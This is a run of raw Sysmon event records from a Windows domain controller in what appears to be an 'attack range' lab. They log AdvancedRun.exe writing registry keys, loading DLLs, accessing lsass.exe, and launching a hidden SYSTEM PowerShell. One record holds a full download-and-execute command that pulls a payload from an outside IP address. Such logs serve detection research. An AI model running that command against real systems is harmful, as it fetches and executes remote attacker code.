13241300x80000000000000004080340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.822{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004080339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 
20:17:29.821{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.818{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.818{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.817{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.817{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004080334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.817{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local 
Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004080333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.811{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.811{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004080331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.811{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004080328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:29.433{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=0C5492DFFA271BC1912BADFEBB497907,SHA256=536C445B9D489749547FAC1D0B01AF7F430BBFE31BCD2924E7DB3BFE66785452trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004080327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 
20:17:28.855{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004080326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.846{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.842{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.842{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 734700x80000000000000004080315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.837{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValidATTACKRANGE\Administrator 
12241200x80000000000000004080299Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.839{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080298Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.839{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004080297Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.838{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 734700x80000000000000004080295Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.835{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=1029851F233A4FFD537D7B924F6078E9,SHA256=48FAA459585093FD2423A991B264219E5D7E0D37328D5CE6BDA917AB02607E31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004080294Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.835{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samcli.dll10.0.14393.0 (rs1_release.160715-1616)Security Accounts Manager Client 
DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMCLI.DLLMD5=F67DFB27AACE637BEA56D3EB0726B943,SHA256=3663C2F3579BEBAF433AF101902ADA3FF87A3A6005F0AF77D1894458286E3656trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004080293Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.834{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080292Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:28.834{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004080291Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.833{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=12ED40D048D0F5F44D3877936A1B7E8B,SHA256=8E652B0663D0F0C6BFE7102329C9A84FB1E937273E51F8FF0FC3469350AF5C41trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004080290Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.830{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 
12241200x80000000000000004080289Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.830{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004080288Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.829{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004080287Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.829{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=CA7A58C10B61327C283100DD9277811A,SHA256=13D357E647DB3DFDFE35C56E4CC78244B35647CCA53D34F94F318DA7C848E09FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004080286Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:28.826{834264DD-DAE6-61EA-0D00-000000002702}8761012C:\Windows\system32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004080285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.823{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator 154100x80000000000000004079786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.841{834264DD-14D0-61EB-A008-000000002702}5124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit powershell.exe -nop -w hidden -c "IEX ((new-object 
net.webclient).downloadstring('http://34.218.235.219:80/b'))"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runATTACKRANGE\Administrator 10341000x80000000000000004079785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.839{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004079784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.839{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004079783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079758Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079756Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
